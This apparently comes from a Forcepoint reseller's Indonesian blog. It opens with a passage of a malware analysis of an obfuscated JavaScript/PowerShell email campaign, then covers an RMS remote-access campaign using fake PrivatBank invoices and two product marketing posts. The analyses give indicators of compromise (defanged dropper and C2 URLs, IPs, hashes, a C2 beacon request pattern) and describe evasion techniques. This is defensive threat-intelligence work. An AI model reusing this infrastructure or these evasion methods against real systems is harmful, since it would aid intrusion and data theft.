mengunduh dan mengeksekusi kode dari server tersebut. 4. Memuat PowerShell tambahan & komunikasi C2 Payload yang diterima: SHA1: d70b9c14c4146ade02c79eaf8aa335f1c50d4636 Ketika dijalankan, melakukan GET request ke server lain: fjjlkfakeinfkid.top/uvj0epxg28htr.php?id=<machine>&key=<token>&s=<time> Parameter kemungkinan berarti: id → nama komputer/identifier unik key → token autentikasi s → parameter sleep/waktu eksekusi Teknik Lanjutan 1. Penyembunyian lewat junk code Baris komentar dalam jumlah besar dipakai untuk: mengaburkan kode asli mengganggu analisis statis menambah entropi untuk menghindari deteksi 2. Eksekusi tersembunyi dengan conhost headless String hasil decoding: “winmgmts:root\cimv2:Win32_Process” → akses WMI untuk manipulasi proses “conhost –head” → menjalankan host konsol tanpa tampilan (stealth) Ciri khas malware modern yang ingin menjalankan proses tanpa terlihat oleh pengguna. Kesimpulan Serangan ini: memanfaatkan reputasi PEC untuk mem-bypass filtering email menggunakan JavaScript yang sangat ter-obfuscate untuk mengunduh payload PowerShell terhubung ke server staging dan C2 menjalankan proses secara tersembunyi (stealth) Forcepoint menyatakan bahwa pelanggannya terlindungi pada beberapa tahap (pemblokiran URL, dropper, dan C2). IOC (Indicators of Compromise) 1. Dropper URLs (customerconverse[.]com subdomains) nk916b6wt4xq0kq92uq9a5b8xdk19cqbizqfbty7sw1jehqee3ds[.]customerconverse[.]com/aoc9h3 z6gil1l15rfl2ikt3x0cm307tvdip66tlwnr2b3cqwkbgcylevcb8mdti[.]customerconverse[.]com/r2dmo x48zo70ug1hl10tdvxqxl24l32rud7ngbbsbnotcs7i1e6er081[.]customerconverse[.]com/xbqz7v vx0yg09a6hpisfw16qvltqbrn100daxzzinazj6kk[.]customerconverse[.]com/hkcv1t drlnx69mthj55zkbpcbfno3m0dsv11b0pb1ywj98au5e1pq4quzb[.]customerconverse[.]com/a4die1 we5h0up8c8mf9sslzqxpliyvgdfjtfsqyk1ic6zouyfub1t5ob82rw3ur8xq[.]customerconverse[.]com/73l1g2 g2kwlrkkzd1g83q362jnl31vluwb2vykomkk6cmd[.]customerconverse[.]com/pv10qv wkfijx7cycdybkodehsq2lrc94n1tzm7skn87vn6t6f4s0oq[.]customerconverse[.]com/vfcn5i 3kcje55g7aih98vzkdfgqbfhihjdwhyp8q82s21xblv77qmx0snij[.]customerconverse[.]com/m7tksk 2. Hash 90b8febf952dcb6d943418dbeff1eb487abfcfbc d70b9c14c4146ade02c79eaf8aa335f1c50d4636 3. Staging URL hxxp://gizpvovur[.]top/1.php?s=mints13 4. C2 Server fjjlkfakeinfkid[.]top Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan Forcepoint indonesia, merupakan bagian dari PT. iLogo Infralogy Indonesia, yang merupakan mitra terpercaya dalam solusi Infrastruktur IT dan Cybersecurity terbaik di Indonesia. Hubungi kami sekarang atau kunjungi Forcepoint.ilogoindonesia.id untuk informasi lebih lanjut!

Sepanjang tahun 2024, para peretas semakin sering memanfaatkan layanan dan perangkat lunak sah untuk menjalankan serangan. Baru-baru ini, tim X-Labs mengamati sebuah kampanye kecil namun menarik yang menyamar sebagai konfirmasi pembayaran resmi dari salah satu bank terbesar di Ukraina. Dalam serangan ini, pelaku menggunakan alat Remote Manipulator System (RMS) untuk mengambil alih sistem korban. 1. Teknik dan Vektor Serangan Semua email dalam kampanye ini menggunakan subjek “Платіжне доручення” (Payment Order) dan berasal dari berbagai akun—kemungkinan besar akun yang telah diretas. Email ditujukan kepada: Domain pemerintah Perusahaan besar Meski isi email berbahasa Ukraina, besar kemungkinan penerimanya tidak berbahasa Ukraina, sehingga menambah kecurigaan. Isi email sangat singkat dan hampir identik antar sampel, dengan satu-satunya perbedaan pada nama pengirim. Lampiran email berupa PDF yang tampak seperti surat resmi dari PrivatBank, bank milik negara terbesar di Ukraina. Rantai File: PDF → Bitbucket → ZIP → ZIP → RAR → SCR Link di dalam PDF mengarah ke: hxxps://bitbucket[.]org/invoicepays/file/downloads/doc.7 Link ini mengunduh ZIP, yang berisi: ZIP lain Folder dengan password untuk membuka RAR RAR melindungi file SCR berbahaya dan beberapa PDF umpan Akhirnya, korban mencapai file utama: SCR (SFX RAR) → mengekstrak dan menjalankan MSI berbahaya MSI memasang alat RMS modifikasi dan menghubungkan sistem korban ke server C2 Rusia Selama proses, PDF asli ditampilkan untuk menyamarkan aktivitas jahat. 2. Analisis File Berbahaya SCR (SFX RAR) Mengandung installer MSI Mengekstrak beberapa PDF palsu untuk mengalihkan perhatian pengguna Memulai instalasi RMS secara senyap MSI MSI menginstal komponen RMS: rutserv.exe rfusclient.exe Keduanya adalah versi yang dimodifikasi dan dikompilasi ulang menggunakan Embarcadero Delphi. Perilaku Rfusclient.exe Mengecek geolokasi melalui registry → kemungkinan geofencing Mengumpulkan informasi perangkat penyimpanan Perilaku Rutserv.exe Memanipulasi restore point melalui proses sah SrTasks.exe Menggunakan layanan Volume Shadow Copy (vssvc.exe) Terhubung ke server C2 pada port tidak biasa Tujuan Utama Perekaman aktivitas pengguna Pengumpulan informasi Pengambilalihan sistem korban lewat koneksi RMS otomatis ke server C2 3. Kesimpulan Kampanye ini menyebarkan alat RMS dengan memanfaatkan invoice bank palsu. Teknik bertahap—dengan banyak lapisan ZIP/RAR dan penyamaran PDF—digunakan untuk menipu korban dan menyembunyikan instalasi malware. Target: Pemerintah Perusahaan besar Tujuan: Kontrol penuh sistem Eksfiltrasi data Pemantauan aktivitas pengguna 4. Perlindungan (Forcepoint) Forcepoint mendeteksi dan memblokir ancaman ini pada beberapa tahap: Tahap 2: PDF palsu diblokir Tahap 3: URL Bitbucket dikategorikan mencurigakan Tahap 5: File dropper ditandai sebagai berbahaya Tahap 6: Koneksi ke C2 diblokir 5. Indikator Kompromi (IOCs) Hash Payload pdf: b6892fce… 7z: e186dc51… rar: dcef5895… scr: b64a9c36… msi: b5481a9f… exe: e8136675… exe: 8e782dd2… URL Unduhan hxxps://bitbucket[.]org/invoicepays/file/downloads/doc.7 Server C2 95[.]213[.]205[.]83 111[.]90[.]140[.]34 65[.]21[.]245[.]7 Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan Forcepoint indonesia, merupakan bagian dari PT. iLogo Infralogy Indonesia, yang merupakan mitra terpercaya dalam solusi Infrastruktur IT dan Cybersecurity terbaik di Indonesia. Hubungi kami sekarang atau kunjungi Forcepoint.ilogoindonesia.id untuk informasi lebih lanjut!

Sering kali, salah satu cara terbaik untuk menilai apakah sebuah teknologi layak dipertimbangkan adalah dengan melihat apa yang dikatakan oleh pengguna di dunia nyata. Karena itu, kami merasa sangat bangga bahwa Forcepoint diakui sebagai Customers’ Choice untuk tahun 2024 dalam laporan Gartner Peer Insights Voice of the Customer for Security Service Edge (SSE). Dalam laporan tertanggal 27 September 2024, Forcepoint memperoleh Rating Keseluruhan 4,7 dari 5 di pasar Security Service Edge dan 98% tingkat kesediaan untuk merekomendasikan, berdasarkan 65 ulasan di Gartner Peer Insights per 31 Juli 2024. Kami juga mendapatkan skor tertinggi yang sama dalam kategori Product Capabilities. Laporan Gartner Peer Insights Voice of the Customer mengumpulkan komentar dari para pengguna nyata produk-produk tersebut. Seperti yang dijelaskan dalam laporan, “Organisasi memanfaatkan Security Service Edge sebagai solusi untuk secara efisien mendukung tenaga kerja hibrida dengan berbagai kemampuan keamanan dan cloud. Catatan ini membantu para pemimpin keamanan dan manajemen risiko untuk belajar dari peringkat dan ulasan rekan-rekan mereka yang dibagikan di Gartner Peer Insights.” Membantu organisasi dan para penggunanya agar dapat menggunakan data bisnis dengan aman di mana pun dalam dunia yang berubah cepat saat ini adalah inti dari misi kami. Solusi SSE berbasis data kami, Forcepoint ONE, secara unik menggabungkan perlindungan ancaman tingkat lanjut dan keamanan data kelas perusahaan dengan pengalaman pengguna yang luar biasa — membuat orang lebih produktif, menurunkan biaya operasional, mengurangi risiko, dan menyederhanakan kepatuhan. Yang paling penting adalah apa yang dikatakan pelanggan kami dalam ulasan Gartner Peer Insights, seperti: “Produk yang hebat dan layanan luar biasa dari Forcepoint. Sangat direkomendasikan.” “Benar-benar produk yang luar biasa yang menggabungkan seluruh fungsi Forcepoint dalam satu solusi.” “Forcepoint ONE adalah solusi keamanan Zero Trust yang sempurna untuk tenaga kerja hibrida, di mana orang bekerja dari mana saja dan data berada di mana-mana.” Untuk informasi lebih lanjut tentang ulasan pelanggan kami dan untuk melihat mengapa Gartner mengakui Forcepoint sebagai Customers’ Choice, silakan baca laporan lengkapnya. Gartner, Voice of the Customer for Security Service Edge oleh Peer Contributors, 27 September 2024 GARTNER adalah merek dagang dan merek layanan terdaftar, PEER INSIGHTS adalah merek dagang dan merek layanan, dan lencana GARTNER PEER INSIGHTS CUSTOMERS’ CHOICE adalah merek dagang dan merek layanan dari Gartner, Inc. dan/atau afiliasinya di AS dan secara internasional, serta digunakan di sini dengan izin. Semua hak dilindungi undang-undang. Konten Gartner Peer Insights terdiri atas opini individu pengguna akhir berdasarkan pengalaman pribadi mereka dan tidak boleh dianggap sebagai pernyataan fakta atau mewakili pandangan Gartner atau afiliasinya. Gartner tidak mendukung vendor, produk, atau layanan apa pun yang disebutkan dalam konten ini dan tidak memberikan jaminan, baik tersurat maupun tersirat, mengenai keakuratan atau kelengkapan konten tersebut, termasuk jaminan kelayakan jual atau kesesuaian untuk tujuan tertentu. Lencana GARTNER PEER INSIGHTS CUSTOMERS’ CHOICE merupakan opini subjektif dari ulasan pengguna akhir, penilaian, dan data yang diterapkan berdasarkan metodologi terdokumentasi; tidak mewakili pandangan atau merupakan bentuk dukungan dari Gartner maupun afiliasinya. Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan forcepoint indonesia, merupakan bagian dari PT. iLogo Infralogy Indonesia, yang merupakan mitra terpercaya dalam solusi Infrastruktur IT dan Cybersecurity terbaik di Indonesia. Hubungi kami sekarang atau kunjungi forcepoint.ilogoindonesia.id untuk informasi lebih lanjut!

Di lanskap digital saat ini, adopsi cepat terhadap aplikasi SaaS telah memicu meningkatnya Shadow IT — penggunaan sistem, aplikasi, dan layanan teknologi tanpa persetujuan resmi dari departemen TI organisasi. Tren ini dapat menimbulkan tantangan besar bagi bisnis, mulai dari kerentanan keamanan hingga risiko kepatuhan. Mari kita bahas lebih dalam tentang apa itu Shadow IT modern, risiko yang ditimbulkannya, dan bagaimana Forcepoint ONE CASB dapat membantu organisasi mengatasi tantangan tersebut untuk menciptakan lingkungan TI yang aman dan patuh terhadap regulasi. Apa Itu Shadow IT Modern? Shadow IT terjadi ketika karyawan menggunakan aplikasi SaaS yang tidak diizinkan untuk menyelesaikan pekerjaan mereka. Contohnya bisa berupa penggunaan platform berbagi file seperti Dropbox atau akun pribadi Google Drive, hingga penggunaan alat manajemen proyek dan aplikasi komunikasi seperti WhatsApp atau Telegram. Belakangan ini, situs GenAI (Generative AI) juga menjadi salah satu tempat yang paling sering digunakan untuk mencari informasi baru atau menghasilkan konten. Meskipun Shadow IT dapat mendorong kreativitas dan meningkatkan produktivitas, hal ini juga menjadi titik buta keamanan yang besar bagi tim TI, membuka peluang bagi kebocoran data, kerentanan sistem, dan pelanggaran kepatuhan terhadap regulasi industri. Memahami risiko ini sangat penting bagi organisasi yang ingin menjaga kendali atas lingkungan TI mereka dan melindungi data sensitif. Risiko yang Ditimbulkan oleh Shadow IT 1. Kehilangan atau Kebocoran Data Sensitif Shadow IT dapat menyebabkan data tersimpan di berbagai lokasi yang tidak terpantau, meningkatkan risiko kehilangan atau pencurian data. Hal ini terutama terjadi pada situs GenAI, di mana pengguna kerap mengunggah data sensitif dengan maksud baik untuk menghasilkan konten yang lebih relevan. 2. Kerentanan Keamanan Aplikasi yang tidak disetujui mungkin tidak memenuhi standar keamanan organisasi, sehingga rentan terhadap serangan siber. Tanpa pengawasan TI, sulit memastikan apakah aplikasi tersebut dilindungi dengan baik. 3. Masalah Kepatuhan (Compliance) Banyak industri memiliki regulasi ketat terkait penyimpanan data, privasi, dan keamanan. Penggunaan aplikasi yang tidak disetujui dapat menyebabkan pelanggaran kepatuhan, berujung pada sanksi hukum dan kerusakan reputasi organisasi. Forcepoint ONE CASB (Cloud Access Security Broker) Hadir Sebagai Solusi Forcepoint ONE CASB menawarkan kemampuan Shadow IT discovery yang komprehensif dengan mengidentifikasi dan memantau semua aplikasi serta layanan yang digunakan dalam jaringan organisasi — baik yang disetujui maupun yang tidak. Fitur ini membantu organisasi meningkatkan visibilitas, menilai risiko, dan menerapkan kebijakan keamanan sehingga seluruh sumber daya TI selaras dengan standar korporat dan persyaratan kepatuhan. Forcepoint ONE CASB menyediakan dua metode utama untuk mendeteksi Shadow IT di organisasi Anda: Mengunggah log firewall langsung ke portal Forcepoint ONE CASB. Menerapkan OVA appliance untuk menyiapkan syslog streaming, yang kemudian mengirimkan data ke portal Forcepoint ONE. Fitur-Fitur Utama Forcepoint ONE CASB untuk Mengelola Risiko Shadow IT 1. Peningkatan Visibilitas Visibilitas adalah kunci dalam mengelola lingkungan TI secara efektif. Alat Shadow IT discovery dari Forcepoint ONE CASB memberikan pandangan menyeluruh terhadap semua layanan dan aplikasi cloud yang digunakan. Tingkat visibilitas ini sangat penting untuk mengidentifikasi serta mengurangi potensi risiko, memastikan keamanan dan kepatuhan di seluruh organisasi. 2. Penilaian Skor Risiko (Risk Score Assessment) Forcepoint ONE CASB memungkinkan pelanggan menilai dan mengelola risiko cloud dengan Cloud Score Widgets Wizard. Alat ini menghitung skor risiko berdasarkan berbagai atribut aplikasi dan Trust Rating otomatis dari Forcepoint ONE SSE. Pelanggan dapat menyesuaikan bobot setiap atribut (1–10) di halaman Cloud Score Weights, sehingga dapat memprioritaskan faktor yang paling penting. Misalnya, jika kepatuhan terhadap GAAP dianggap penting, aplikasi dengan kepatuhan GAAP akan memperoleh skor lebih tinggi. Pengaturan tambahan berupa slider memungkinkan pengguna menyesuaikan pengaruh Trust Rating sesuai prioritas keamanan organisasi. 3. Forensik Forcepoint ONE CASB menyediakan mekanisme analisis lalu lintas jaringan untuk mendeteksi perilaku pengguna yang tidak normal. Saat anomali teridentifikasi, organisasi dapat segera mengambil tindakan seperti containment untuk mengurangi ancaman. Pengguna juga dapat melihat rincian lengkap setiap aplikasi, termasuk jumlah koneksi unik, data yang diunggah, serta skor keamanan cloud-nya. Kesimpulan Shadow IT adalah konsekuensi alami dari lingkungan kerja modern yang serba cepat dan berbasis cloud. Namun tanpa pengelolaan yang tepat, hal ini dapat menimbulkan risiko besar bagi organisasi. Dengan memanfaatkan Forcepoint ONE CASB, organisasi dapat memperoleh visibilitas dan kontrol penuh atas penggunaan aplikasi cloud, meminimalkan risiko keamanan, serta memastikan lingkungan TI yang aman, patuh, dan efisien. Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan forcepoint indonesia, merupakan bagian dari PT. iLogo Infralogy Indonesia, yang merupakan mitra terpercaya dalam solusi Infrastruktur IT dan Cybersecurity terbaik di Indonesia. Hubungi kami sekarang atau kunjungi forcepoint.ilogoindonesia.id untuk informasi lebih lanjut!